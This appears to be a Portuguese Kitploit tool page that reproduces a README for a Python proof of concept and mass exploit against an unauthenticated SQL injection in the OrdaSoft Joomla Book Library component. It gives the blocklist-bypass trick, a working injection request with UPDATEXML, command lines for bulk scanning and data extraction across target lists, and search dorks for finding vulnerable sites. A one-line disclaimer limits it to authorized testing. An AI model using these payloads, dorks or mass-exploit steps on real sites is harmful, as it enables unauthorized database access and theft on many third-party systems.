Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-101110 — PoC em Python 3 e exploit em massa para CVE-2026-101110, uma injeção SQL ORDER BY não autenticada no OrdaSoft Joomla Book Library <=6.4.6 através dos parâmetros field/direction. | Kitploit
Ferramentas/GitHubGitHub/murrez/cve-2026-101110
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoScripting e AutomaçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubmurrez/cve-2026-101110

CVE-2026-101110

há 4 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

PoC em Python 3 e exploit em massa para CVE-2026-101110, uma injeção SQL ORDER BY não autenticada no OrdaSoft Joomla Book Library <=6.4.6 através dos parâmetros field/direction.

Ver Repositório
Compartilhar

CVE-2026-101110 — OrdaSoft Book Library (Free) injeção SQL não autenticada

PoC em Python 3 para CVE-2026-101110 — OrdaSoft Book Library (Free) para Joomla ≤ 6.4.6. Atualize para 6.4.7+.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Catálogohttps://pocbit.org/pocs/
Componentecom_booklibrary
Arquivo / funçãosite/booklibrary.php → books()
Parâmetrosfield, direction (ordenação)
AutenticaçãoNenhuma (listagens públicas de livros)
CWECWE-89 Injeção SQL
CVSS 4.09.3 Crítico (Joomla CNA)
CréditoAla Arfaoui

Resumo da vulnerabilidade (Türkçe)

Book Library (Free) é um plugin da OrdaSoft que fornece biblioteca de livros / listagens de categorias no Joomla. Nas versões 6.4.6 e anteriores, a função books() filtra os parâmetros field e direction com protectInjectionWithoutQuote(). Essa função aplica apenas uma lista de bloqueio fraca que procura pela subcadeia select; ao encontrá-la, envolve o valor com $db->quote(), mas não o rejeita.

Os valores são então concatenados em uma expressão ORDER BY sem aspas — onde o uso de quote não impede a injeção SQL (descrição do CNA).

Duas condições para exploração:

  1. Priming de sessão: A primeira requisição grava os valores padrão de ordenação (field / direction) armazenados na sessão.
  2. Bypass da lista de bloqueio: Na segunda requisição, um comentário decoy -- xselect é anexado ao final do payload; ele passa pela verificação da lista de bloqueio, e o comentário SQL neutraliza o restante do payload.

Resultado: ORDER BY SQLi sem autenticação, com risco crítico para leitura/escrita no banco de dados e integridade do site.


Mecanismo técnico

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

Filtro fraco (conceitual):

  • A entrada contém select (subcadeia) → envolve todo o valor em quotes (irrelevante no contexto de ORDER BY).
  • O atacante adiciona -- xselect para que a lista de bloqueio veja select dentro da cauda do comentário, enquanto a expressão ativa antes de -- permanece como SQL executável (truques baseados em erro / UPDATEXML / ORDER BY empilhado).

O PoC implementa:

EtapaAção
FingerprintCaminhos de com_booklibrary + versão opcional do manifesto
Descoberta de rotashowCategory, search, showBooks, books, … + catid / Itemid extraídos
checkPrime da sessão → confirma SQLi (flag / VERSION())
exploitPrime → extração com --subquery (padrão SELECT VERSION())
mass--list + -j alvos em paralelo; exploited.txt em caso de vazamento bem-sucedido

Sufixo de payload constante no código: -- xselect (BLACKLIST_DECOY).


Requisitos

cd CVE-2026-101110
pip install -r requirements.txt

Uso

Alvo único

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

Massa em lote (fluxo exploit-first)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagSignificado
--aggressiveO modo check tenta vazamento de versão após o prime
--subqueryExpressão interna para payloads UPDATEXML / double-query
--exploited-listExtrações bem-sucedidas separadas por tabulação
--no-colorDesativa ANSI (também NO_COLOR)

JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


Exemplo HTTP

Prime (sessão):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

Inject (o PoC anexa o decoy):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

Variantes POST são tentadas na mesma rota quando o GET falha.


Detecção de versão

Manifesto (se exposto):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → linha vulnerável; ≥ 6.4.7 → corrigido (patched_version na saída do check).


Dorks FOFA

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

CVEs relacionadas da OrdaSoft (Set 2026)

CVEExtensãoProblemaCorrigido
CVE-2026-101110Book LibraryORDER BY SQLi + bypass de lista de bloqueio6.4.7
CVE-2026-101111Book LibraryXSS refletido (parâmetro title)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

Corrija todos os componentes OrdaSoft que você utiliza.


Referências

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • Histórico: SQLi mais antiga em com_booklibrary nas tarefas search/lend (CVE-2010-1522) — caminhos de código diferentes

Legal

Apenas testes autorizados e validação de patches.


Descrição do repositório GitHub

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
Baixar ferramenta